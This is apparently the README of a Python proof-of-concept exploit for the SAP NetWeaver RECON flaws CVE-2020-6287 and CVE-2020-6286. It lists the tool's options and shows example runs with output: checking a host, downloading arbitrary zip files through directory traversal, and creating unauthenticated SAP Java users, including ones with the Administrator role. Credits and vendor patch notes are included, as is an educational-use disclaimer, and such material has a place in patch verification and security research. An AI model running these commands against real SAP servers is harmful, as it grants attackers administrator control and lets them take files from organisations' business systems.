PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)

Primary LanguagePython

PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)

Pffff! RECON (Remotely Exploitable Code On NetWeaver)? Guys, really? That was the best codename you came up with? :)

This scrip allows to check SAP LM Configuration Wizard missing authorization check vulnerability and as a PoC script exploits directory traversal in queryProtocol method.

Directory traversal allows to download any zip from SAP server.

This project is created only for educational purposes and cannot be used for law violation or personal gain.
The author of this project is not responsible for any possible harm caused by the materials of this project

Original finding:

CVE-2020-6287: Pablo Artuso
CVE-2020-6286: Yvan 'iggy' G.

Solution: #2934135, #2939665

How to use

Just point SAP NW AS Java hostnmae/ip.

There is additional options:

  1. -c - check if SAP server is vulnerable to RECON
  2. -f - download zip file from SAP server
  3. -u - create user SAP JAVA user with Authenticated User role
  4. -a - create user SAP JAVA user with Administrator role

Ex.: Download zip file

~python RECON.py -H -f /1111.zip
Check1 - Vulnerable! -
Ok! File zipfile_929.zip was saved

Ex.: Create SAP JAVA user

~python RECON.py -H -u
Check1 - Vulnerable! -
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created

Ex.: Create SAP JAVA Administrator user

~python RECON.py -H -a
Check1 - Vulnerable! [CVE-2020-6287] (RECON) -
Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
Ok! Admin user were created

All options

~python RECON.py -h
usage: RECON.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-f ZIPFILE]
                [-u] [-a] [--timeout TIMEOUT] [-v]

PoC for CVE-2020-6287,  (RECON)
This scrip allows to check SAP LM Configuration Wizard missing authorization check vulnerability and exploits dir traversal in queryProtocol method
Original finding:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy

- Spencer McIntyre https://twitter.com/zeroSteiner

Solution: https://launchpad.support.sap.com/#/notes/2934135, https://launchpad.support.sap.com/#/notes/2939665

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  Java NW host (default:
  -P PORT, --port PORT  Java NW web port (default: tcp/50000)
  -p PROXY, --proxy PROXY
                        Use proxy (ex:
  -s, --ssl             enable SSL
  -c, --check           just detect vulnerability
  -f ZIPFILE, --zipfile ZIPFILE
                        ZIP file to read. CVE-2020-6286
  -u, --user            Create simple JAVA user. CVE-2020-6287
  -a, --admin           Create JAVA user with role "Administrator". CVE-2020-6287
  --timeout TIMEOUT     HTTP connection timeout in second (default: 10)
  -v, --verbose         verbose mode